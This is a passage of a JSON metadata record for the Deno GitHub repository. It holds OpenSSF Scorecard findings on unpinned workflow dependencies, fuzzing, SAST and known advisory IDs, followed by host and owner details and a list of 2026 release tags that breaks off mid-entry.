.github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"depende